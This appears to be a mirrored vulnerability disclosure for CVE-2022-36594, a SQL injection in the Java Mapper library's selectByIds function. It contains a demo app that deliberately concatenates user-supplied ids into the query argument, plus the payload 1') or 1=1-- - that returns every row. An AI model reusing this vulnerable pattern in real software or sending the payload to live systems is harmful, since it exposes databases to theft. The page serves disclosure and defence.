Headline

CVE-2022-36594: selectByIds function sql injection · Issue #862 · abel533/Mapper

Mapper v4.0.0 to v4.2.0 was discovered to contain a SQL injection vulnerability via the ids parameter at the selectByIds function.

2 years ago

CVE

Open in Source

#sql #vulnerability #apache #java

Write the following test demo：
1、UserController.java：
@controller
public class UserController {

@Autowired
UserService userService;

@RequestMapping("gets")
@ResponseBody
public List<User> getUser(String ids) {
    List<String> idList = Arrays.asList(ids.split(","));

    return userService.gets(idList);
}

}
2、UserService.java：
@service
public interface UserService {

List<User> gets(Collection<String> ids);

}
3、UserServiceImpl.java：
@service
public class UserServiceImpl implements UserService {

@Autowired
UserMapper userMapper;

@Override
public List<User> gets(Collection<String> ids) {
    if (ids == null || ids.isEmpty())
        return new ArrayList<>();
    String concatIds = StringUtils.concat(ids, "'", ",");
    return (List<User>) userMapper.selectByIds(concatIds);
}

}
4、UserMapper.java：
@org.apache.ibatis.annotations.Mapper
public interface UserMapper extends Mapper, MySqlMapper, IdsMapper {

}
5、Access the /gets route in the above demo for sql injection attack：
（1）Under normal circumstances, when the ids parameter value is passed in 1, 2, the data with id 1 and 2 can be obtained：

（2）But when the ids parameter value is 1’) or 1=1-- -, you can get all the data in the database：

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

1 year ago

1 year ago

1 year ago

1 year ago

1 year ago